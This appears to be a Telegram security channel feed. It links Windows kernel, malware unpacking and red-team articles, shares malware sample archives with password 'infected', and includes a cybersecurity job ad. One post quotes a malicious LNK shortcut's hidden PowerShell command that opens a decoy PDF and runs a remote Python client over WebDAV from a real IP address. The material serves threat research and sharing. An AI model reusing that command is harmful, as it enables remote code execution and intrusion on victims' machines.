Catalog of key Windows kernel data structures
https://codemachine.com/articles/kernel_structures.html
Understanding EProcess Structure
https://info-savvy.com/understanding-eprocess-structure/
Thanks to https://x.com/5mukx
Just an attempt to group extracted data from Defender for research purposes.
https://github.com/HackingLZ/ExtractedDefender
credits : Justin Elze
Local Admin In Less Than 60 Seconds (Part 1)
https://medium.com/@nickvourd/local-admin-in-less-than-60-seconds-part-1-e2a0c0102b99
Snowy Days & The Malware Packing Ways
https://deluks2006.github.io/posts/snowy-days-and-the-malware-packing-ways/
#packers
Source Byte
I gathered samples related to the attack against Iran's State Broadcaster. If you have access to those three missing files, please share them in the group. File password: infected. Credits: vx-underground, MalwareBazaar, Check Point.
Iran's State Broadcaster.zip (4.2 MB)
Thanks "a gh" for sharing the missing files (two Windows event logs). Password is infected.
Forwarded from Infosec Fortress
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access
🔗 Link
#redteam
#initial_access
———
🆔 @Infosec_Fortress
https://cyble.com/blog/ursnif-trojan-hides-with-stealthy-tactics/
LNK files are so strange: you can literally do anything with them, and yet there is no security log to detect them :(
or even run Python remotely
-w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"
19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc.lnk (2.9 KB)
Forwarded from Alee
There is a job opportunity in the field of cybersecurity. If you are interested in working in this field, please send your resume via LinkedIn [ HERE ] or via Telegram [ @AleeAmini ].
[ + ] Familiarity with reverse engineering and malware analysis.
[ + ] Familiarity with one of the programming languages Python, C/C++.
[ + ] Familiarity with the Linux operating system.
[ + ] Familiarity with security concepts.
[ + ] Familiarity with Python, PowerShell and Bash scripting.
[ + ] Familiarity with cyber attacks.
Skills that are considered as advantages:
[ + ] Familiarity with Threat Intelligence.
[ + ] Familiarity with CTI concepts.
[ + ] Mastery of reverse engineering and binary analysis.
[ + ] Familiarity with Windows/Linux internals.
Hi,
one thing I forgot to mention :/
these job opportunities are CTI & TR at the moment, and they are only available in Tehran.
Have a nice day 😬
Hijack the TypeLib. New COM persistence technique
https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661
Agent Tesla Analysis [Part 1: Unpacking]
https://ryan-weil.github.io/posts/AGENT-TESLA-1/
Deobfuscation of Lumma Stealer
https://ryan-weil.github.io/posts/LUMMA-STEALER/
Dark web threats and dark market predictions for 2025
https://securelist.com/ksb-dark-web-predictions-2025/114966/
Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations
https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/
Exploring Kernel Callbacks in Windows for Red Teamers / Developers
1734722992877.pdf (1 MB)
Forwarded from Infosec Fortress
The Kernel Hacker's Guide to the Galaxy
Automating Exploit Engineering Workflows
H2HC 2024
#binary
#kernel
#exploitation
———
🆔 @Infosec_Fortress